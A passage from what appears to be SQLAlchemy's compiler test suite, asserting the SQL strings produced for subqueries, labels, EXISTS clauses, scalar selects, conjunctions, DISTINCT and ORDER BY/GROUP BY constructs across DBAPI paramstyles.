        sq.select(),
        "SELECT myid, name, description FROM "
        "(SELECT mytable.myid AS myid, "
        "mytable.name AS name, mytable.description "
        "AS description FROM mytable)",
    )

    sq = select([table1]).alias("sq")
    self.assert_compile(
        sq.select(sq.c.myid == 7),
        "SELECT sq.myid, sq.name, sq.description FROM "
        "(SELECT mytable.myid AS myid, mytable.name AS name, "
        "mytable.description AS description FROM mytable) AS sq "
        "WHERE sq.myid = :myid_1",
    )

    sq = select(
        [table1, table2],
        and_(table1.c.myid == 7, table2.c.otherid == table1.c.myid),
        use_labels=True,
    ).alias("sq")

    sqstring = (
        "SELECT mytable.myid AS mytable_myid, mytable.name AS "
        "mytable_name, mytable.description AS mytable_description, "
        "myothertable.otherid AS myothertable_otherid, "
        "myothertable.othername AS myothertable_othername FROM "
        "mytable, myothertable WHERE mytable.myid = :myid_1 AND "
        "myothertable.otherid = mytable.myid"
    )

    self.assert_compile(
        sq.select(),
        "SELECT sq.mytable_myid, sq.mytable_name, "
        "sq.mytable_description, sq.myothertable_otherid, "
        "sq.myothertable_othername FROM (%s) AS sq" % sqstring,
    )

    # a second level of labeling prepends the outer alias name again.
    sq2 = select([sq], use_labels=True).alias("sq2")
    self.assert_compile(
        sq2.select(),
        "SELECT sq2.sq_mytable_myid, sq2.sq_mytable_name, "
        "sq2.sq_mytable_description, sq2.sq_myothertable_otherid, "
        "sq2.sq_myothertable_othername FROM "
        "(SELECT sq.mytable_myid AS "
        "sq_mytable_myid, sq.mytable_name AS sq_mytable_name, "
        "sq.mytable_description AS sq_mytable_description, "
        "sq.myothertable_otherid AS sq_myothertable_otherid, "
        "sq.myothertable_othername AS sq_myothertable_othername "
        "FROM (%s) AS sq) AS sq2" % sqstring,
    )

def test_select_from_clauselist(self):
    self.assert_compile(
        select([ClauseList(column("a"), column("b"))]).select_from(
            text("sometable")
        ),
        "SELECT a, b FROM sometable",
    )

def test_use_labels(self):
    self.assert_compile(
        select([table1.c.myid == 5], use_labels=True),
        "SELECT mytable.myid = :myid_1 AS anon_1 FROM mytable",
    )

    self.assert_compile(
        select([func.foo()], use_labels=True), "SELECT foo() AS foo_1"
    )

    # this is native_boolean=False for default dialect
    self.assert_compile(
        select([not_(True)], use_labels=True),
        "SELECT :param_1 = 0 AS anon_1",
    )

    self.assert_compile(
        select([cast("data", Integer)], use_labels=True),
        "SELECT CAST(:param_1 AS INTEGER) AS anon_1",
    )

    self.assert_compile(
        select(
            [func.sum(func.lala(table1.c.myid).label("foo")).label("bar")]
        ),
        "SELECT sum(lala(mytable.myid)) AS bar FROM mytable",
    )

    self.assert_compile(
        select([keyed]), "SELECT keyed.x, keyed.y" ", keyed.z FROM keyed"
    )

    self.assert_compile(
        select([keyed]).apply_labels(),
        "SELECT keyed.x AS keyed_x, keyed.y AS "
        "keyed_y, keyed.z AS keyed_z FROM keyed",
    )

def test_paramstyles(self):
    # one statement, rendered under each of the five DBAPI paramstyles.
    stmt = text("select :foo, :bar, :bat from sometable")

    self.assert_compile(
        stmt,
        "select ?, ?, ? from sometable",
        dialect=default.DefaultDialect(paramstyle="qmark"),
    )
    self.assert_compile(
        stmt,
        "select :foo, :bar, :bat from sometable",
        dialect=default.DefaultDialect(paramstyle="named"),
    )
    self.assert_compile(
        stmt,
        "select %s, %s, %s from sometable",
        dialect=default.DefaultDialect(paramstyle="format"),
    )
    self.assert_compile(
        stmt,
        "select :1, :2, :3 from sometable",
        dialect=default.DefaultDialect(paramstyle="numeric"),
    )
    self.assert_compile(
        stmt,
        "select %(foo)s, %(bar)s, %(bat)s from sometable",
        dialect=default.DefaultDialect(paramstyle="pyformat"),
    )

def test_anon_param_name_on_keys(self):
    # the column key ("colx"/"coly"), not the column name, drives the
    # generated parameter name.
    self.assert_compile(
        keyed.insert(),
        "INSERT INTO keyed (x, y, z) VALUES (%(colx)s, %(coly)s, %(z)s)",
        dialect=default.DefaultDialect(paramstyle="pyformat"),
    )
    self.assert_compile(
        keyed.c.coly == 5,
        "keyed.y = %(coly_1)s",
        checkparams={"coly_1": 5},
        dialect=default.DefaultDialect(paramstyle="pyformat"),
    )

def test_dupe_columns(self):
    """test that deduping is performed against clause
    element identity, not rendered result."""

    # three distinct column() objects with the same name: all render.
    self.assert_compile(
        select([column("a"), column("a"), column("a")]),
        "SELECT a, a, a",
        dialect=default.DefaultDialect(),
    )

    # the same object three times: deduped to one.
    c = column("a")
    self.assert_compile(
        select([c, c, c]), "SELECT a", dialect=default.DefaultDialect()
    )

    a, b = column("a"), column("b")
    self.assert_compile(
        select([a, b, b, b, a, a]),
        "SELECT a, b",
        dialect=default.DefaultDialect(),
    )

    # using alternate keys.
    a, b, c = (
        Column("a", Integer, key="b"),
        Column("b", Integer),
        Column("c", Integer, key="a"),
    )
    self.assert_compile(
        select([a, b, c, a, b, c]),
        "SELECT a, b, c",
        dialect=default.DefaultDialect(),
    )

    self.assert_compile(
        select([bindparam("a"), bindparam("b"), bindparam("c")]),
        "SELECT :a AS anon_1, :b AS anon_2, :c AS anon_3",
        dialect=default.DefaultDialect(paramstyle="named"),
    )

    self.assert_compile(
        select([bindparam("a"), bindparam("b"), bindparam("c")]),
        "SELECT ? AS anon_1, ? AS anon_2, ? AS anon_3",
        dialect=default.DefaultDialect(paramstyle="qmark"),
    )

    self.assert_compile(
        select([column("a"), column("a"), column("a")]), "SELECT a, a, a"
    )

    s = select([bindparam("a"), bindparam("b"), bindparam("c")])
    s = s.compile(dialect=default.DefaultDialect(paramstyle="qmark"))
    eq_(s.positiontup, ["a", "b", "c"])

def test_nested_label_targeting(self):
    """test nested anonymous label generation.

    """
    s1 = table1.select()
    s2 = s1.alias()
    s3 = select([s2], use_labels=True)
    s4 = s3.alias()
    s5 = select([s4], use_labels=True)
    self.assert_compile(
        s5,
        "SELECT anon_1.anon_2_myid AS "
        "anon_1_anon_2_myid, anon_1.anon_2_name AS "
        "anon_1_anon_2_name, anon_1.anon_2_descript"
        "ion AS anon_1_anon_2_description FROM "
        "(SELECT anon_2.myid AS anon_2_myid, "
        "anon_2.name AS anon_2_name, "
        "anon_2.description AS anon_2_description "
        "FROM (SELECT mytable.myid AS myid, "
        "mytable.name AS name, mytable.description "
        "AS description FROM mytable) AS anon_2) "
        "AS anon_1",
    )

def test_nested_label_targeting_keyed(self):
    # same nesting as above but against the "keyed" table fixture.
    s1 = keyed.select()
    s2 = s1.alias()
    s3 = select([s2], use_labels=True)
    self.assert_compile(
        s3,
        "SELECT anon_1.x AS anon_1_x, "
        "anon_1.y AS anon_1_y, "
        "anon_1.z AS anon_1_z FROM "
        "(SELECT keyed.x AS x, keyed.y "
        "AS y, keyed.z AS z FROM keyed) AS anon_1",
    )

    s4 = s3.alias()
    s5 = select([s4], use_labels=True)
    self.assert_compile(
        s5,
        "SELECT anon_1.anon_2_x AS anon_1_anon_2_x, "
        "anon_1.anon_2_y AS anon_1_anon_2_y, "
        "anon_1.anon_2_z AS anon_1_anon_2_z "
        "FROM (SELECT anon_2.x AS anon_2_x, "
        "anon_2.y AS anon_2_y, "
        "anon_2.z AS anon_2_z FROM "
        "(SELECT keyed.x AS x, keyed.y AS y, keyed.z "
        "AS z FROM keyed) AS anon_2) AS anon_1",
    )

def test_exists(self):
    s = select([table1.c.myid]).where(table1.c.myid == 5)

    self.assert_compile(
        exists(s),
        "EXISTS (SELECT mytable.myid FROM mytable "
        "WHERE mytable.myid = :myid_1)",
    )

    self.assert_compile(
        exists(s.as_scalar()),
        "EXISTS (SELECT mytable.myid FROM mytable "
        "WHERE mytable.myid = :myid_1)",
    )

    self.assert_compile(
        exists([table1.c.myid], table1.c.myid == 5).select(),
        "SELECT EXISTS (SELECT mytable.myid FROM "
        "mytable WHERE mytable.myid = :myid_1) AS anon_1",
        params={"mytable_myid": 5},
    )
    self.assert_compile(
        select([table1, exists([1], from_obj=table2)]),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description, EXISTS (SELECT 1 "
        "FROM myothertable) AS anon_1 FROM mytable",
        params={},
    )
    self.assert_compile(
        select([table1, exists([1], from_obj=table2).label("foo")]),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description, EXISTS (SELECT 1 "
        "FROM myothertable) AS foo FROM mytable",
        params={},
    )

    self.assert_compile(
        table1.select(
            exists()
            .where(table2.c.otherid == table1.c.myid)
            .correlate(table1)
        ),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "EXISTS (SELECT * FROM myothertable WHERE "
        "myothertable.otherid = mytable.myid)",
    )
    self.assert_compile(
        table1.select(
            exists()
            .where(table2.c.otherid == table1.c.myid)
            .correlate(table1)
        ),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "EXISTS (SELECT * FROM myothertable WHERE "
        "myothertable.otherid = mytable.myid)",
    )

    self.assert_compile(
        table1.select(
            exists()
            .where(table2.c.otherid == table1.c.myid)
            .correlate(table1)
        ).replace_selectable(table2, table2.alias()),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "EXISTS (SELECT * FROM myothertable AS "
        "myothertable_1 WHERE myothertable_1.otheri"
        "d = mytable.myid)",
    )
    self.assert_compile(
        table1.select(
            exists()
            .where(table2.c.otherid == table1.c.myid)
            .correlate(table1)
        )
        .select_from(
            table1.join(table2, table1.c.myid == table2.c.otherid)
        )
        .replace_selectable(table2, table2.alias()),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable JOIN "
        "myothertable AS myothertable_1 ON "
        "mytable.myid = myothertable_1.otherid "
        "WHERE EXISTS (SELECT * FROM myothertable "
        "AS myothertable_1 WHERE "
        "myothertable_1.otherid = mytable.myid)",
    )

    self.assert_compile(
        select(
            [
                or_(
                    exists().where(table2.c.otherid == "foo"),
                    exists().where(table2.c.otherid == "bar"),
                )
            ]
        ),
        "SELECT (EXISTS (SELECT * FROM myothertable "
        "WHERE myothertable.otherid = :otherid_1)) "
        "OR (EXISTS (SELECT * FROM myothertable WHERE "
        "myothertable.otherid = :otherid_2)) AS anon_1",
    )

    self.assert_compile(
        select([exists([1])]), "SELECT EXISTS (SELECT 1) AS anon_1"
    )

    self.assert_compile(
        select([~exists([1])]), "SELECT NOT (EXISTS (SELECT 1)) AS anon_1"
    )

    self.assert_compile(
        select([~(~exists([1]))]),
        "SELECT NOT (NOT (EXISTS (SELECT 1))) AS anon_1",
    )

def test_where_subquery(self):
    s = select(
        [addresses.c.street],
        addresses.c.user_id == users.c.user_id,
        correlate=True,
    ).alias("s")

    # don't correlate in a FROM list
    self.assert_compile(
        select([users, s.c.street], from_obj=s),
        "SELECT users.user_id, users.user_name, "
        "users.password, s.street FROM users, "
        "(SELECT addresses.street AS street FROM "
        "addresses, users WHERE addresses.user_id = "
        "users.user_id) AS s",
    )
    self.assert_compile(
        table1.select(
            table1.c.myid == select([table1.c.myid], table1.c.name == "jack")
        ),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "mytable.myid = (SELECT mytable.myid FROM "
        "mytable WHERE mytable.name = :name_1)",
    )
    self.assert_compile(
        table1.select(
            table1.c.myid
            == select(
                [table2.c.otherid], table1.c.name == table2.c.othername
            )
        ),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "mytable.myid = (SELECT "
        "myothertable.otherid FROM myothertable "
        "WHERE mytable.name = myothertable.othernam"
        "e)",
    )
    self.assert_compile(
        table1.select(exists([1], table2.c.otherid == table1.c.myid)),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "EXISTS (SELECT 1 FROM myothertable WHERE "
        "myothertable.otherid = mytable.myid)",
    )
    talias = table1.alias("ta")
    s = subquery(
        "sq2", [talias], exists([1], table2.c.otherid == talias.c.myid)
    )
    self.assert_compile(
        select([s, table1]),
        "SELECT sq2.myid, sq2.name, "
        "sq2.description, mytable.myid, "
        "mytable.name, mytable.description FROM "
        "(SELECT ta.myid AS myid, ta.name AS name, "
        "ta.description AS description FROM "
        "mytable AS ta WHERE EXISTS (SELECT 1 FROM "
        "myothertable WHERE myothertable.otherid = "
        "ta.myid)) AS sq2, mytable",
    )

    # test constructing the outer query via append_column(), which
    # occurs in the ORM's Query object
    s = select(
        [], exists([1], table2.c.otherid == table1.c.myid), from_obj=table1
    )
    s.append_column(table1)
    self.assert_compile(
        s,
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable WHERE "
        "EXISTS (SELECT 1 FROM myothertable WHERE "
        "myothertable.otherid = mytable.myid)",
    )

def test_orderby_subquery(self):
    self.assert_compile(
        table1.select(
            order_by=[
                select(
                    [table2.c.otherid], table1.c.myid == table2.c.otherid
                )
            ]
        ),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable ORDER BY "
        "(SELECT myothertable.otherid FROM "
        "myothertable WHERE mytable.myid = "
        "myothertable.otherid)",
    )
    self.assert_compile(
        table1.select(
            order_by=[
                desc(
                    select(
                        [table2.c.otherid],
                        table1.c.myid == table2.c.otherid,
                    )
                )
            ]
        ),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description FROM mytable ORDER BY "
        "(SELECT myothertable.otherid FROM "
        "myothertable WHERE mytable.myid = "
        "myothertable.otherid) DESC",
    )

def test_scalar_select(self):
    # a bare Select has no type; it must be converted via as_scalar()
    # before use inside a column expression.
    assert_raises_message(
        exc.InvalidRequestError,
        r"Select objects don't have a type\. Call as_scalar\(\) "
        r"on this Select object to return a 'scalar' "
        r"version of this Select\.",
        func.coalesce,
        select([table1.c.myid]),
    )

    s = select([table1.c.myid], correlate=False).as_scalar()
    self.assert_compile(
        select([table1, s]),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description, (SELECT mytable.myid "
        "FROM mytable) AS anon_1 FROM mytable",
    )
    s = select([table1.c.myid]).as_scalar()
    self.assert_compile(
        select([table2, s]),
        "SELECT myothertable.otherid, "
        "myothertable.othername, (SELECT "
        "mytable.myid FROM mytable) AS anon_1 FROM "
        "myothertable",
    )
    s = select([table1.c.myid]).correlate(None).as_scalar()
    self.assert_compile(
        select([table1, s]),
        "SELECT mytable.myid, mytable.name, "
        "mytable.description, (SELECT mytable.myid "
        "FROM mytable) AS anon_1 FROM mytable",
    )

    s = select([table1.c.myid]).as_scalar()
    s2 = s.where(table1.c.myid == 5)
    self.assert_compile(
        s2,
        "(SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_1)",
    )
    self.assert_compile(s, "(SELECT mytable.myid FROM mytable)")

    # test that aliases use as_scalar() when used in an explicitly
    # scalar context
    s = select([table1.c.myid]).alias()
    self.assert_compile(
        select([table1.c.myid]).where(table1.c.myid == s),
        "SELECT mytable.myid FROM mytable WHERE "
        "mytable.myid = (SELECT mytable.myid FROM "
        "mytable)",
    )
    self.assert_compile(
        select([table1.c.myid]).where(s > table1.c.myid),
        "SELECT mytable.myid FROM mytable WHERE "
        "mytable.myid < (SELECT mytable.myid FROM "
        "mytable)",
    )
    s = select([table1.c.myid]).as_scalar()
    self.assert_compile(
        select([table2, s]),
        "SELECT myothertable.otherid, "
        "myothertable.othername, (SELECT "
        "mytable.myid FROM mytable) AS anon_1 FROM "
        "myothertable",
    )

    # test expressions against scalar selects
    self.assert_compile(
        select([s - literal(8)]),
        "SELECT (SELECT mytable.myid FROM mytable) "
        "- :param_1 AS anon_1",
    )
    self.assert_compile(
        select([select([table1.c.name]).as_scalar() + literal("x")]),
        "SELECT (SELECT mytable.name FROM mytable) "
        "|| :param_1 AS anon_1",
    )
    self.assert_compile(
        select([s > literal(8)]),
        "SELECT (SELECT mytable.myid FROM mytable) "
        "> :param_1 AS anon_1",
    )
    self.assert_compile(
        select([select([table1.c.name]).label("foo")]),
        "SELECT (SELECT mytable.name FROM mytable) "
        "AS foo",
    )

    # scalar selects should not have any attributes on their 'c' or
    # 'columns' attribute
    s = select([table1.c.myid]).as_scalar()
    try:
        s.c.foo
    except exc.InvalidRequestError as err:
        assert (
            str(err)
            == "Scalar Select expression has no columns; use this "
            "object directly within a column-level expression."
        )

    try:
        s.columns.foo
    except exc.InvalidRequestError as err:
        assert (
            str(err)
            == "Scalar Select expression has no columns; use this "
            "object directly within a column-level expression."
        )

    zips = table(
        "zips", column("zipcode"), column("latitude"), column("longitude")
    )
    places = table("places", column("id"), column("nm"))
    zipcode = "12345"
    qlat = (
        select([zips.c.latitude], zips.c.zipcode == zipcode)
        .correlate(None)
        .as_scalar()
    )
    qlng = (
        select([zips.c.longitude], zips.c.zipcode == zipcode)
        .correlate(None)
        .as_scalar()
    )

    q = select(
        [
            places.c.id,
            places.c.nm,
            zips.c.zipcode,
            func.latlondist(qlat, qlng).label("dist"),
        ],
        zips.c.zipcode == zipcode,
        order_by=["dist", places.c.nm],
    )

    self.assert_compile(
        q,
        "SELECT places.id, places.nm, "
        "zips.zipcode, latlondist((SELECT "
        "zips.latitude FROM zips WHERE "
        "zips.zipcode = :zipcode_1), (SELECT "
        "zips.longitude FROM zips WHERE "
        "zips.zipcode = :zipcode_2)) AS dist FROM "
        "places, zips WHERE zips.zipcode = "
        ":zipcode_3 ORDER BY dist, places.nm",
    )

    zalias = zips.alias("main_zip")
    qlat = select(
        [zips.c.latitude], zips.c.zipcode == zalias.c.zipcode
    ).as_scalar()
    qlng = select(
        [zips.c.longitude], zips.c.zipcode == zalias.c.zipcode
    ).as_scalar()
    q = select(
        [
            places.c.id,
            places.c.nm,
            zalias.c.zipcode,
            func.latlondist(qlat, qlng).label("dist"),
        ],
        order_by=["dist", places.c.nm],
    )
    self.assert_compile(
        q,
        "SELECT places.id, places.nm, "
        "main_zip.zipcode, latlondist((SELECT "
        "zips.latitude FROM zips WHERE "
        "zips.zipcode = main_zip.zipcode), (SELECT "
        "zips.longitude FROM zips WHERE "
        "zips.zipcode = main_zip.zipcode)) AS dist "
        "FROM places, zips AS main_zip ORDER BY "
        "dist, places.nm",
    )

    a1 = table2.alias("t2alias")
    s1 = select([a1.c.otherid], table1.c.myid == a1.c.otherid).as_scalar()
    j1 = table1.join(table2, table1.c.myid == table2.c.otherid)
    s2 = select([table1, s1], from_obj=j1)
    self.assert_compile(
        s2,
        "SELECT mytable.myid, mytable.name, "
        "mytable.description, (SELECT "
        "t2alias.otherid FROM myothertable AS "
        "t2alias WHERE mytable.myid = "
        "t2alias.otherid) AS anon_1 FROM mytable "
        "JOIN myothertable ON mytable.myid = "
        "myothertable.otherid",
    )

def test_label_comparison_one(self):
    x = func.lala(table1.c.myid).label("foo")
    self.assert_compile(
        select([x], x == 5),
        "SELECT lala(mytable.myid) AS foo FROM "
        "mytable WHERE lala(mytable.myid) = "
        ":param_1",
    )

def test_label_comparison_two(self):
    self.assert_compile(
        label("bar", column("foo", type_=String)) + "foo",
        "foo || :param_1",
    )

def test_order_by_labels_enabled(self):
    lab1 = (table1.c.myid + 12).label("foo")
    lab2 = func.somefunc(table1.c.name).label("bar")
    dialect = default.DefaultDialect()

    self.assert_compile(
        select([lab1, lab2]).order_by(lab1, desc(lab2)),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY foo, bar DESC",
        dialect=dialect,
    )

    # the function embedded label renders as the function
    self.assert_compile(
        select([lab1, lab2]).order_by(func.hoho(lab1), desc(lab2)),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY hoho(mytable.myid + :myid_1), bar DESC",
        dialect=dialect,
    )

    # binary expressions render as the expression without labels
    self.assert_compile(
        select([lab1, lab2]).order_by(lab1 + "test"),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY mytable.myid + :myid_1 + :param_1",
        dialect=dialect,
    )

    # labels within functions in the columns clause render
    # with the expression
    self.assert_compile(
        select([lab1, func.foo(lab1)]).order_by(lab1, func.foo(lab1)),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "foo(mytable.myid + :myid_1) AS foo_1 FROM mytable "
        "ORDER BY foo, foo(mytable.myid + :myid_1)",
        dialect=dialect,
    )

    lx = (table1.c.myid + table1.c.myid).label("lx")
    ly = (func.lower(table1.c.name) + table1.c.description).label("ly")

    self.assert_compile(
        select([lx, ly]).order_by(lx, ly.desc()),
        "SELECT mytable.myid + mytable.myid AS lx, "
        "lower(mytable.name) || mytable.description AS ly "
        "FROM mytable ORDER BY lx, ly DESC",
        dialect=dialect,
    )

    # expression isn't actually the same thing (even though label is)
    self.assert_compile(
        select([lab1, lab2]).order_by(
            table1.c.myid.label("foo"), desc(table1.c.name.label("bar"))
        ),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY mytable.myid, mytable.name DESC",
        dialect=dialect,
    )

    # it's also an exact match, not aliased etc.
    self.assert_compile(
        select([lab1, lab2]).order_by(
            desc(table1.alias().c.name.label("bar"))
        ),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY mytable_1.name DESC",
        dialect=dialect,
    )

    # but! it's based on lineage
    lab2_lineage = lab2.element._clone()
    self.assert_compile(
        select([lab1, lab2]).order_by(desc(lab2_lineage.label("bar"))),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY bar DESC",
        dialect=dialect,
    )

    # here, 'name' is implicitly available, but w/ #3882 we don't
    # want to render a name that isn't specifically a Label elsewhere
    # in the query
    self.assert_compile(
        select([table1.c.myid]).order_by(table1.c.name.label("name")),
        "SELECT mytable.myid FROM mytable ORDER BY mytable.name",
    )

    # as well as if it doesn't match
    self.assert_compile(
        select([table1.c.myid]).order_by(
            func.lower(table1.c.name).label("name")
        ),
        "SELECT mytable.myid FROM mytable ORDER BY lower(mytable.name)",
    )

def test_order_by_labels_disabled(self):
    lab1 = (table1.c.myid + 12).label("foo")
    lab2 = func.somefunc(table1.c.name).label("bar")
    dialect = default.DefaultDialect()
    # with the flag off, ORDER BY repeats the full expressions rather
    # than referencing the labels.
    dialect.supports_simple_order_by_label = False
    self.assert_compile(
        select([lab1, lab2]).order_by(lab1, desc(lab2)),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY mytable.myid + :myid_1, somefunc(mytable.name) DESC",
        dialect=dialect,
    )
    self.assert_compile(
        select([lab1, lab2]).order_by(func.hoho(lab1), desc(lab2)),
        "SELECT mytable.myid + :myid_1 AS foo, "
        "somefunc(mytable.name) AS bar FROM mytable "
        "ORDER BY hoho(mytable.myid + :myid_1), "
        "somefunc(mytable.name) DESC",
        dialect=dialect,
    )

def test_no_group_by_labels(self):
    # GROUP BY never uses label shorthand, even when ORDER BY would.
    lab1 = (table1.c.myid + 12).label("foo")
    lab2 = func.somefunc(table1.c.name).label("bar")
    dialect = default.DefaultDialect()

    self.assert_compile(
        select([lab1, lab2]).group_by(lab1, lab2),
        "SELECT mytable.myid + :myid_1 AS foo, somefunc(mytable.name) "
        "AS bar FROM mytable GROUP BY mytable.myid + :myid_1, "
        "somefunc(mytable.name)",
        dialect=dialect,
    )

def test_conjunctions(self):
    a, b, c = text("a"), text("b"), text("c")
    x = and_(a, b, c)
    assert isinstance(x.type, Boolean)
    assert str(x) == "a AND b AND c"
    self.assert_compile(
        select([x.label("foo")]), "SELECT a AND b AND c AS foo"
    )

    self.assert_compile(
        and_(
            table1.c.myid == 12,
            table1.c.name == "asdf",
            table2.c.othername == "foo",
            text("sysdate() = today()"),
        ),
        "mytable.myid = :myid_1 AND mytable.name = :name_1 "
        "AND myothertable.othername = "
        ":othername_1 AND sysdate() = today()",
    )

    self.assert_compile(
        and_(
            table1.c.myid == 12,
            or_(
                table2.c.othername == "asdf",
                table2.c.othername == "foo",
                table2.c.otherid == 9,
            ),
            text("sysdate() = today()"),
        ),
        "mytable.myid = :myid_1 AND (myothertable.othername = "
        ":othername_1 OR myothertable.othername = :othername_2 OR "
        "myothertable.otherid = :otherid_1) AND sysdate() = "
        "today()",
        checkparams={
            "othername_1": "asdf",
            "othername_2": "foo",
            "otherid_1": 9,
            "myid_1": 12,
        },
    )

    # test a generator
    self.assert_compile(
        and_(
            conj for conj in [table1.c.myid == 12, table1.c.name == "asdf"]
        ),
        "mytable.myid = :myid_1 AND mytable.name = :name_1",
    )

def test_nested_conjunctions_short_circuit(self):
    """test that empty or_(), and_() conjunctions are collapsed by
    an enclosing conjunction."""

    t = table("t", column("x"))

    self.assert_compile(
        select([t]).where(and_(t.c.x == 5, or_(and_(or_(t.c.x == 7))))),
        "SELECT t.x FROM t WHERE t.x = :x_1 AND t.x = :x_2",
    )
    self.assert_compile(
        select([t]).where(and_(or_(t.c.x == 12, and_(or_(t.c.x == 8))))),
        "SELECT t.x FROM t WHERE t.x = :x_1 OR t.x = :x_2",
    )
    self.assert_compile(
        select([t]).where(
            and_(
                or_(
                    or_(t.c.x == 12),
                    and_(or_(), or_(and_(t.c.x == 8)), and_()),
                )
            )
        ),
        "SELECT t.x FROM t WHERE t.x = :x_1 OR t.x = :x_2",
    )

def test_true_short_circuit(self):
    t = table("t", column("x"))

    self.assert_compile(
        select([t]).where(true()),
        "SELECT t.x FROM t WHERE 1 = 1",
        dialect=default.DefaultDialect(supports_native_boolean=False),
    )
    self.assert_compile(
        select([t]).where(true()),
        "SELECT t.x FROM t WHERE true",
        dialect=default.DefaultDialect(supports_native_boolean=True),
    )

    self.assert_compile(
        select([t]),
        "SELECT t.x FROM t",
        dialect=default.DefaultDialect(supports_native_boolean=True),
    )

def test_distinct(self):
    self.assert_compile(
        select([table1.c.myid.distinct()]),
        "SELECT DISTINCT mytable.myid FROM mytable",
    )

    self.assert_compile(
        select([distinct(table1.c.myid)]),
        "SELECT DISTINCT mytable.myid FROM mytable",
    )

    self.assert_compile(
        select([table1.c.myid]).distinct(),
        "SELECT DISTINCT mytable.myid FROM mytable",
    )

    self.assert_compile(
        select([func.count(table1.c.myid.distinct())]),
        "SELECT count(DISTINCT mytable.myid) AS count_1 FROM mytable",
    )

    self.assert_compile(
        select([func.count(distinct(table1.c.myid))]),
        "SELECT count(DISTINCT mytable.myid) AS count_1 FROM mytable",
    )

def test_where_empty(self):
    # empty and_()/or_() in WHERE collapse to no WHERE clause at all.
    self.assert_compile(
        select([table1.c.myid]).where(and_()),
        "SELECT mytable.myid FROM mytable",
    )
    self.assert_compile(
        select([table1.c.myid]).where(or_()),
        "SELECT mytable.myid FROM mytable",
    )

def test_order_by_nulls(self):
    self.assert_compile(
        table2.select(
            order_by=[
                table2.c.otherid,
                table2.c.othername.desc().nullsfirst(),
            ]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid, "
        "myothertable.othername DESC NULLS FIRST",
    )

    self.assert_compile(
        table2.select(
            order_by=[
                table2.c.otherid,
                table2.c.othername.desc().nullslast(),
            ]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid, "
        "myothertable.othername DESC NULLS LAST",
    )

    self.assert_compile(
        table2.select(
            order_by=[
                table2.c.otherid.nullslast(),
                table2.c.othername.desc().nullsfirst(),
            ]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid NULLS LAST, "
        "myothertable.othername DESC NULLS FIRST",
    )

    self.assert_compile(
        table2.select(
            order_by=[
                table2.c.otherid.nullsfirst(),
                table2.c.othername.desc(),
            ]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid NULLS FIRST, "
        "myothertable.othername DESC",
    )

    self.assert_compile(
        table2.select(
            order_by=[
                table2.c.otherid.nullsfirst(),
                table2.c.othername.desc().nullslast(),
            ]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid NULLS FIRST, "
        "myothertable.othername DESC NULLS LAST",
    )

def test_orderby_groupby(self):
    self.assert_compile(
        table2.select(
            order_by=[table2.c.otherid, asc(table2.c.othername)]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid, "
        "myothertable.othername ASC",
    )

    self.assert_compile(
        table2.select(
            order_by=[table2.c.otherid, table2.c.othername.desc()]
        ),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid, "
        "myothertable.othername DESC",
    )

    # generative order_by
    self.assert_compile(
        table2.select()
        .order_by(table2.c.otherid)
        .order_by(table2.c.othername.desc()),
        "SELECT myothertable.otherid, myothertable.othername FROM "
        "myothertable ORDER BY myothertable.otherid, "
        "myothertable.othername DESC",
    )

    self.assert_compile(
        table2.select()
        .order_by(table2.c.otherid)
        .order_by(table2.c.othername.desc())
        .order_by(None),
        "SELECT myothertable.otherid, myothertable.othername "
        "FROM myothertable",
    )

    self.assert_compile(
        select(
            [table2.c.othername, func.count(table2.c.otherid)],
            group_by=[table2.c.othername],
        ),
        "SELECT myothertable.othername, "
        "count(myothertable.otherid) AS count_1 "
        "FROM myothertable GROUP BY myothertable.othername",
    )

    # generative group by
    self.assert_compile(
        select(
            [table2.c.othername, func.count(table2.c.otherid)]
        ).group_by(table2.c.othername),
        "SELECT myothertable.othername, "
        "count(myothertable.otherid) AS count_1 "
        "FROM myothertable GROUP BY myothertable.othername",
    )

    self.assert_compile(
        select([table2.c.othername, func.count(table2.c.otherid)])
        .group_by(table2.c.othername)
        .group_by(None),
        "SELECT myothertable.othername, "
        "count(myothertable.otherid) AS count_1 "
        "FROM myothertable",
    )

    self.assert_compile(
        select(
            [table2.c.othername, func.count(table2.c.otherid)],
